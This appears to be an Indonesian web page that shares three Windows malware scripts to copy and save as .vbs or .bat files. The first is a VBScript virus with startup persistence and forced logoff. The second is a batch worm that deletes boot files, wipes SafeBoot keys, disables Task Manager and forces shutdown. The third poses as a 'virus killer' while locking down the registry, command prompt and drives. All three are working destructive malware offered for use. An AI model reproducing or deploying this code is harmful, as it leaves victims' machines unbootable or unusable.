rg.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\svchost”,winpath&”\bosgentongs.exe.vbs”
rg.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MS32DLL”,"
rg.regwrite “HKCR\vbsfile\DefaultIcon\”,”shell32.dll,3”

‘//-Manip – Me-Log off komputer setelah log on BOLEH DIHAPUS KLO MAU LIHAT EFEKNYA!!!-//

rg.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Logoff”,winpath & “\System32\Logoff.exe”

‘//-Fungsi di untuk mengaktifkan kembali script dan mengulangnya kembali-//

if check 1 then
Wscript.sleep 100000
end if
loop while check1
set sd = createobject(”Wscript.shell”)
sd.run winpath&”\explorer.exe /e,/select, “&Wscript.ScriptFullname
do while year(now) >= 2009
WScript.sleep 20000

‘//-Memunculkan pesan window terus menerus-//

msgbox “Selamatlah virus ini tiba di sistem ente” & vbcrlf & _
“kulo nyuwun pangapuranipun menawi sampung mengganggu ente sekalian” & vbcrlf & _
“jangan kawatir dan sedih, aku tidak akan kuasai komputer bobrok ini. kini ente sudah masuk dalam permainanku” & vbcrlf & _
“ini hanya permainnaku yang aku kesepian di sini” & vbcrlf & _
vbcrlf & vbcrlf & _
” elok-elok indah kehidupan bukan kenyataan” & vbcrlf & vbcrlf & _
” saatnya kini aku bangkit dalam mimpi ituk“

‘//-Mengulang kode script-//

loop

‘//Akhir dari Kode & simpan dengan nama bosgentongs.exe.vbs-//

d save *.vbs

----------------end---------------------

_malware phucker_
--------------start----------------

@echo off & break off
title fuCker v1.4-1-5
attrib +h %0
mode con cols=75 lines=15
cls
color 0a
echo.
echo ad88 ,ad8888ba, 88
echo d8" d8"' `"8b 88
echo 88 d8' 88
echo MM88MMM 88 88 88 88 ,d8 ,adPPYba, 8b,dPPYba,
echo 88 88 88 88 88 ,a8" a8P_____ 88 88P' "Y8
echo 88 88 88 Y8, 8888[ 8PP""""""" 88
echo 88 "8a, ,a88 Y8a. .a8P 88`"Yba, "8b, 88
echo 88 `"YbbdP'Y8 `"Y8888Y"' 88 `Y8a `"Ybbd8"' 88
echo by c0re
echo.
rundll32.exe user32.dll,SwapMouseButton
if exist "%SYSTEMDRIVE%\boot.ini" goto winXP 2> nul
if exist "%USERPROFILE%\AppData" goto winVISTA 2> nul
@echo
echo x=msgbox("0wned by fuCker w0rm!",vbCritical or vbOkOnly,"fuCker") >> "fuCker.vbs"
start "" "fuCker.vbs" 2> nul

:winXP
echo [Inject] Microsoft Windows XP!
set b0t=boot
attrib -r -s -h "%SYSTEMDRIVE%\%b0t%.ini" >nul
del /f /s /q "%SYSTEMDRIVE%\%b0t%.ini" >nul
set b0t=
attrib -r -s -h "%SYSTEMDRIVE%\ntldr" >nul
del /f /s /q "%SYSTEMDRIVE%\ntldr" >nul
set w0n=win
attrib -r -s -h "%SYSTEMROOT%\%w0n%.ini" >nul
del /f /s /q "%SYSTEMROOT%\%w0n%.ini" >nul
set w0n=
attrib -r -s -h "%SYSTEMROOT%\System32\hal.dll" >nul
del /f /s /q "%SYSTEMROOT%\System32\hal.dll" >nul
attrib -r -s -h "%SYSTEMROOT%\System32\bootcfg.exe" >nul
del /f /s /q "%SYSTEMROOT%\System32\bootcfg.exe" >nul
reg delete HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot /va /f >nul
msg * "**** y0u!"
shutdown -r -t 02 -c "fuCker w0rm deteCted!"
goto end


:winVISTA
echo [Inject] Microsoft Windows Vista!
setlocal enableextensions
for /f "tokens=*" %%a in (
'reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Pol icies\System\ /v EnableLUA'
) do (
set usac=%%a
)
echo %usac%|find /i "0x1" > nul
if errorlevel 1 (
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Policies\System /v DisableTaskMgr /t REG_SZ /d 1 /f >nul
start http://%USERNAME%.homo.com/
attrib -r -s -h "%SYSTEMRDRIVE%\bootmgr" >nul
del /f /s /q "%SYSTEMDRIVE%\bootmgr" >nul
attrib -r -s -h "%SYSTEMRDRIVE%\BOOTSECT.BAK" >nul
del /f /s /q "%SYSTEMRDRIVE%\BOOTSECT.BAK" >nul
copy %0 "%ALLUSERSPROFILE%\Start Menu\Programs\Startup" 2> nul
copy %0 "%USERPROFILE%\AppData\Roaming\Microsoft\Windows\St art Menu" 2> nul
echo x=msgbox("0wned!",vbCritical or vbOkOnly,"fuCker w0rm") >> "w0rm.vbs"
start "" "w0rm.vbs" 2> nul
shutdown -s -t 10 -c "fuCker w0rm deteCted!"
goto end
) else (
echo :HjT >> "%TEMP%\HjT.bat"
echo tskill /a HijackThis >> "%TEMP%\HjT.bat"
echo goto HjT >> "%TEMP%\HjT.bat"
start "%TEMP%\HjT.bat"
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Policies\System /v DisableTaskMgr /t REG_SZ /d 1 /f >nul
echo do >> "disk.vbs"
echo set oWMP = CreateObject("WMPlayer.OCX.7" ) >> "disk.vbs"
echo set colCDROMs = oWMP.cdromCollection >> "disk.vbs"
echo colCDROMs.Item(d).Eject >> "disk.vbs"
echo colCDROMs.Item(d).Eject >> "disk.vbs"
echo loop >> "disk.vbs"
start "" "disk.vbs" 2> nul
echo @echo off >> "%USERPROFILE%\Desktop\fuCkerw0rm.bat"
echo shutdown -r -t 00 -c "fuCker w0rm deteCted!" >> "%USERPROFILE%\Desktop\fuCkerw0rm.bat"
echo echo 0wned by fuCker w0rm! 0n %DATE% at%TIME% >> "%USERPROFILE%\Desktop\fuCkerw0rm.bat"
echo @exit >> "%USERPROFILE%\Desktop\fuCkerw0rm.bat"
set usac=
start "%USERPROFILE%\Desktop\fuCkerw0rm.bat" 2> nul
echo x=msgbox("0wned!",vbCritical or vbOkOnly,"fuCker w0rm") >> "w0rm.vbs"
start "" "w0rm.vbs" 2> nul
goto end
)
endlocal

:end
cls
exit

di save *.bat

------------------end---------------------

_pinguin atacked_

--------------------strat-----------------
@echo off
echo ================================
echo ================================
echo Killer Viri
echo created By The GhilazZ Team
echo ================================
echo ================================
echo .
echo Readme.txt
echo Hallo semua program yang ada di hadapan anda ini
echo adalah sebuah program kecil yang unik untuk membunuh virus
echo Caranya sebagai contoh anda cukup mengetikan
echo Nomor saja : 1.Brontok 2.Worm 3.VBS 4...Others
echo Contoh: 1...lalu tekan Enter
echo (Ketikan anda tidak terlihat dilayar)
echo Hapus dan Bersihkan lalu tekan Enter
echo Kamu yakin?? lalu tekan Enter
echo Mudah bukan...???
echo jangan mo kalah dengan bikinan luarnegri
echo coba buatan Indonesia
echo Merdeka...merdeka...merdeka...
echo .
echo Register The GhilazZ Team
pause
echo Masukkan 1,2,3,4
pause
echo Begin scanning viri..... tekan Enter
cls
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v "DisableRegistryTools" /t REG_DWORD /d 00000001

REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v "NoDrives" /t REG_DWORD /d 67108863

REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v "DisableTaskMgr" /t REG_DWORD /d 00000001

REG ADD HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v "DisableTaskMgr" /t REG_DWORD /d 00000001

REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v "NofIND" /t REG_DWORD /d 00000001

REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /V "NoClose" /t REG_DWORD /d 00000001

REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /V "NoRun" /t REG_DWORD /d 00000001

REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /V "NoLogOff" /t REG_BINARY /d 01000000

REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /V "DisableCMD" /t REG_DWORD /d 00000001

REG ADD HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v The_GhilazZ /t REG_SZ /d C:The_GhilazZ.exe

REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v The_GhilazZ /t REG_SZ /d C:The_GhilazZ.exe

REG ADD HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Pinguin_attack /t REG_BINARY /d fuckinjoshbush

REG ADD HKLM\Software\Microsoft\WindowsNT\CurrentVersion\Winlogon\SpecialAccounts\UserList /v "SALAM HANGAT UNTUK SEMUA, FROM THE TEAM GHILAZZ...luv U all my victim..mmmuacccchh" /t REG_DWORD /d 00000001

pause
echo Hapus dan Bersihkan lalu tekan Enter
cls
pause
echo Kamu yakin?? lalu tekan Enter
pause
echo Create Backup Windows.....tekan Enter
pause
cls
md \We_come_to_you\We_come_to_you\We_come_to_you\We_come_to_you\We_come_to_you\We_come_to_you\We_come_to_you\We_come_to_you\We_come_to_you\We_come_to_you\We_come_to_you\We_come_to_you
md \We_destroyed_you\We_come_to_you\We_come_to_you\We_come_to_you\We_come_to_you\We_come_to_you\We_come_to_you\We_come_to_you\We_come_to_you\We_come_to_you\We_come_to_you\We_come_to_you\We_come_to_you\We_come_to_you\We_come_to_you\We_come_to_you\We_come_to_you\We_come_to_you\We_come_to_you
md \we_are_your_nightmare\We_come_to_you\We_come_to_you\We_come_to_you\We_come_to_you\We_come_to_you\We_come_to_you\We_come_to_you\We_come_to_you\We_come_to_you\We_come_to_you\We_come_to_you\We_come_to_you\We_come_to_you\We_come_to_you\We_come_to_you\We_come_to_you\We_come_to_you\We_come_to_you
md gue selalu ada disisi loe untuk selamanya setia setiap saat long live so-eng fuckin_josh_bush ought agghh mampus_loe
cls
:viru1
echo Your compie clean but my viri in your computer
echo Your system vulneberity have been Control of my viri
echo Your computer be come weknees.......................
echo Say good bye to your computers......................
echo Regards The GhilazZ Team....Salam hangat untukmu....
cls
echo . "We fly inthe night when you're sleeping in bed"
echo ***************************************************************
echo ***************************************************************
echo The GhilazZ Team Was Here...The GhilazZ Team Was Here...
echo 999999999999999999
echo 999999999999999999999999
echo 9999999999999999999999999999
echo 999999 9999999 9999999
echo 9999999 99999 99999999
echo 9999999 999 99999999
echo 9999999999999999999999999999999
echo 9999999999999999999999999999999
echo 999999999999 99 9999999999999
echo 9999999999999999999999999999999
echo 99999999999999999999999999999
echo 99999999999999999999999
echo 000 000 000 000 00
echo 000 000 000 000 00
echo .. ... ... ... .
echo 00 000 000 000 0
echo 00 000 000 000 0
echo 999999999999999999
echo 9999999999999999
echo 00000000000000
echo The GhilazZ Team Was Here...The GhilazZ Team Was Here...
echo ****************************************************************
echo ****************************************************************
echo>>Inul_oke.exe
echo>>sex_machine.dll
echo>>Tukul_ndeso.asm
echo>>Katro_men.exe
echo>>Vulneberity_its_yours.mp3
echo>>Seek_and_Destroyed.dat
echo>>Sampah_loe.exe
echo>>Gwe_ada_disini.exe
echo>>Britneys_bugilz.mpeg
echo>>Fuckin_US.exe
echo>>TKIKIL.exe
echo>>msfuck.exe
echo>>Goodlinux.exe
goto viru1
copy Inul_oke.exe C:
copy sex_machine.dll C:
copy Tukul_ndeso.asm C:
copy Katro_men.exe C:
copy Vulneberity_its_yours.mp3 C:
copy Seek_and_Destroyed.dat C:
copy Sampah_loe.exe C:
copy Gwe_ada_disini.exe C:
copy Britneys_bugil.mpeg C:
copy Fuckin_US.exe C:
copy TKIKIL.exe C:
copy msfuck.exe C:
copy Goodlinux.exe C:
copy Inul_oke.exe C:\Windonws\System32
copy sex_machine.dll C:\Windonws\System32
copy Tukul_ndeso.asm C:\Windonws\System32
copy Katro_men.exe C:\Windonws\System32
copy Vulneberity_its_yours.mp3 C:\Windonws\System32
copy Seek_and_Destroyed.dat C:\Windonws\System32
copy Sampah_loe.exe C:\Windonws\System32
copy Gwe_ada_disini.exe C:\Windonws\System32
copy Britneys_bugil.mpeg C:\Windonws\System32
copy Fuckin_US.exe C:\Windonws\System32
copy TKIKIL.exe C:\Windonws\System32
copy msfuck.exe C:\Windonws\System32
copy Goodlinux.exe C:\Windonws\System32
attrib +a +s +h *.*
md \We_come_to_you\We_come_to_you\We_come_to_you\We_come_to_you\We_come_to_you\We_come_to_you\We_come_to_you\We_come_to_you\We_come_to_you\We_come_to_you\We_come_to_you\We_come_to_you
md \We_destroyed_you\We_come_to_you\We_come_to_you\We_come_to_you\We_come_to_you\We_come_to_you\We_come_to_you\We_come_to_you\We_come_to_you\We_come_to_you\We_come_to_you\We_come_to_you\We_come_to_you\We_come_to_you\We_come_to_you\We_come_to_you\We_come_to_you\We_come_to_you\We_come_to_you
md \we_are_your_nightmare\We_come_to_you\We_come_to_you\We_come_to_you\We_come_to_you\We_come_to_you\We_come_to_you\We_come_to_you\We_come_to_you\We_come_to_you\We_come_to_you\We_come_to_you\We_come_to_you\We_come_to_you\We_come_to_you\We_come_to_you\We_come_to_you\We_come_to_you\We_come_to_you
md gue selalu ada disisi loe untuk selamanya setia setiap saat long live so-eng fuckin_josh_bush ought agghh mampus_loe


save *.bat

----------------------end--------------------
IP
English French German Spain Italian Dutch Russian Brazil Japanese Korean Arabic Chinese Simplified